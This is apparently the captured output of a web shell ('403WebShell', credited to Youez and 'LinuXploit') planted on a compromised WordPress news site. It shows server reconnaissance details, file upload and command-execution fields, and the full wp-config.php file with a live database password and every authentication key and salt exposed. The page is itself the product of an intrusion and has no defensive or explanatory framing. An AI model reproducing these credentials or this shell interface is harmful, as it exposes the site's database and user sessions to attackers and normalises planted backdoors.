Warning: include_once(/www/wwwroot/dzynews.com/wp-content/mu-plugins/advanced-flow-control.php): Failed to open stream: No such file or directory in /www/wwwroot/dzynews.com/wp-settings.php on line 471

Warning: include_once(): Failed opening '/www/wwwroot/dzynews.com/wp-content/mu-plugins/advanced-flow-control.php' for inclusion (include_path='.:/www/server/php/82/lib/php') in /www/wwwroot/dzynews.com/wp-settings.php on line 471
AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK Interactive Terminal

Command Executor


Warning: chmod(): Operation not permitted in /www/wwwroot/dzynews.com/wp-content/plugins/fileorganizer/fileorganizer.php on line 8
403WebShell
403Webshell
Server IP : dzynews.com  /  Your IP : 216.73.217.105
Web Server : nginx/1.30.3
System : Linux cloud-tdkldl-avd6 5.15.0-91-generic #101-Ubuntu SMP Tue Nov 14 13:30:08 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 8.2.31
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/dzynews.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/dzynews.com//wp-config.php
<?php
/**
 * WordPress 基础配置文件
 *
 * 这个文件被安装程序用于自动生成 wp-config.php 配置文件
 * 您不必使用网站,可以将这个文件复制到「wp-config.php」并填写这些值。
 *
 * 本文件包含以下配置选项:
 *
 * * 数据库设置
 * * 密钥
 * * 数据库表名前缀
 * * ABSPATH
 *
 * @link https://wordpress.org/documentation/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** 数据库设置 - 您可以从您的主机获取这些信息 ** //
/** WordPress 数据库名称 */
define( 'DB_NAME', 'dzy_cpm' );

/** 数据库用户名 */
define( 'DB_USER', 'dzy_cpm' );

/** 数据库密码 */
define( 'DB_PASSWORD', 'DPCnfnXrpCbW6HxW' );

/** 数据库主机 */
define( 'DB_HOST', 'localhost' );

/** 创建表时使用的数据库字符集。 */
define( 'DB_CHARSET', 'utf8mb4' );

/** 数据库排序规则类型。如不确定,请勿更改。 */
define( 'DB_COLLATE', '' );

/**#@+
 * 身份验证唯一密钥与盐。
 *
 * 将这些更改为任意独一无二的字符串!您可以使用
 * {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org 密钥服务}
 * 生成这些。
 *
 * 您可以随时更改这些内容以使所有现有 cookies 失效。
 * 这将强制所有用户必须重新登录。
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '~2qMQdYa&1]0<$N6,g+8#8$[VVE*ka-15|+R>rw?K+7qmZ*dGBfq44PX%|yW|-uU');
define('SECURE_AUTH_KEY',  'n#4w{U9Kp<<+5)Du_t<$b,RosJB7N|g9}>-c`/>O3U~,+ZQ9|U gem3K:*k`lO$h');
define('LOGGED_IN_KEY',    'yy2=hCZD-2=ASR n)YTezJwsz4Du7:*V{A%xBU.UYwLPCqs0]4L[xUJ?v^-z,A-g');
define('NONCE_KEY',        'S<Pv/JjTZ6{8n)y?9WIdP]G!YzBRE%}R)yS@BQlC7,_&Kl/GMeR7A-}nqt*0>Egi');
define('AUTH_SALT',        'L-|Mz +jkaWUH/QYm/Q5p|_n5&8GNs&d]%8<y[hl&bvrWt;jb9/.v/WU|>h!26!%');
define('SECURE_AUTH_SALT', '|=+x{fESbg+NkK.ntVy+>w=(&z8? ~Z9j)5B&r?u(UaYorQ%A]hW:xWVDZ}1ahTL');
define('LOGGED_IN_SALT',   '++a;7:+1p%!}v?Rl}{|0+ ?f:7[@/L;9h8}k(Uu^Xi*_TW}Wl.O[)g_&:Nh>`H*8');
define('NONCE_SALT',       'C&<R&_b0u61F%o<!{b{OiGU0P.@Cgx0C|YaItTCq,)tD6MI7wQ?CzZQyLen|;#9.');

/**#@-*/

/**
 * WordPress 数据表前缀。
 *
 * 如果您为每个安装分配一个唯一前缀,您可以在一个数据库中拥有多个安装。
 * 请只使用数字、字母和下划线!
 */
$table_prefix = 'wp_';

/**
 * 开发者专用:WordPress 调试模式。
 *
 * 将此值更改为 true 以启用开发过程中的通知显示。
 * 强烈建议插件和主题开发人员在其开发环境中使用 WP_DEBUG。
 *
 * 有关可用于调试的其他常量的信息,请访问文档。
 *
 * @link https://wordpress.org/documentation/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/**
 * 简体中文专属:ICP 备案号显示
 *
 * 在设置 → 常规中设置你的 ICP 备案号。
 * 可调用简码 [cn_icp] 或函数 cn_icp() 显示。
 *
 * @since 6.5.0
 * @link https://cn.wordpress.org/support/i10n-features/
 */
define( 'CN_ICP', true );

/**
 * 简体中文专属:公安备案号显示
 *
 * 在设置 → 常规中设置你的公安备案号。
 * 可调用简码 [cn_ga] 或函数 cn_ga() 显示。
 *
 * @since 6.5.0
 * @link https://cn.wordpress.org/support/i10n-features/
 */
define( 'CN_GA', true );

/* 在这行和「停止编辑」行之间添加任何自定义值。 */



/* 就这样,停止编辑!祝您使用愉快。 */

/** WordPress 目录的绝对路径。 */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** 设置 WordPress 变量和包含的文件。 */
require_once ABSPATH . 'wp-settings.php';



Youez - 2016 - github.com/yon3zu
LinuXploit